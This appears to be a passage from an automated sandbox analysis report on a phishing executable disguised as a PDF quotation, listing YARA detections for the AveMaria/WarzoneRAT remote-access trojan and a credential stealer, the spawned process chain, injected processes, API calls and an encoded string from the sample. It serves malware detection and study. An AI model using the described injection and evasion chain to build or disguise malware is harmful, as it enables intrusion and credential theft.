                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004036F7 appears 72 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0040357C appears 31 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00411E88 appears 49 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,33_2_0040EDA9
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWxlgipwjj.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311250060.00000000050B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310399282.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename01533a75-79e9-4266-ae32-2ec7bd6b33c6.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWxlgipwjj.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename01533a75-79e9-4266-ae32-2ec7bd6b33c6.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeBinary or memory string: OriginalFilenameJfnflrtgza.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.logJump to behavior
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@20/4@2/3
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0040D33C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,33_2_00415169
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeReversingLabs: Detection: 44%
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeVirustotal: Detection: 46%
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\donexx.exe "C:\Users\user\AppData\Local\Temp\donexx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fhzejfh.exe "C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fhzejfh.exe "C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\donexx.exe "C:\Users\user\AppData\Local\Temp\donexx.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,33_2_00410B38
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\donexx.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,33_2_004148B6
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,33_2_0041405F
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.csBase64 encoded string: 'Q24XgCHiPkUBkijqc2MNmyqhUWQXkSntfG5fsyH7VXkQhj3OY2QBmSbjaSwDkTDQVmIImArufXJfmzTQWXkBhTHufH4QjX/odWM7uCHhd2MMzwPqZEMdhCHJYngJvCXhdHsBzyPqZEgqlSnqK14KkCH3X3FfpiHudEQQhi3hdywlkCC0d3IQqxTgY34QnSvhK3ABgBvMZWUWkSr7VHgJlS3hK0QBgADuZHZfxny8KCJftTf8dXoGmD3cdWUSkTa0Q34JhCjqUWQXkSntfG4hjDTjf2UBhn/tcXUBmDLiK2QJmy/qZHIXgA=='
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:632:120:WilError_01
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, DHw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, udGXG7eTWZ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, xcV8Zkq.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, w2DT39oPNEB.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, ChR.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, aN5K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, os6BNI0pSpd.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, os6BNI0pSpd.csCryptographic APIs: 'TransformFinalBlock'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, 00000021.00000002.472145644.00000000035BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 